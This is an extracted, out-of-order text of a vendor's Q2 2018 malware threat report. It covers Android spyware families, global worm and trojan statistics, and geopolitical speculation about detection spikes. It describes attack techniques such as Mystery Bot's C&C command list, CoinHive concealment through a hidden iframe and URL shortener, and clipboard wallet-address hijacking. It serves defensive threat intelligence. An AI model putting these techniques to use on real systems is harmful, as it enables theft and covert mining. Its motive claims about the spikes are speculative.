CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
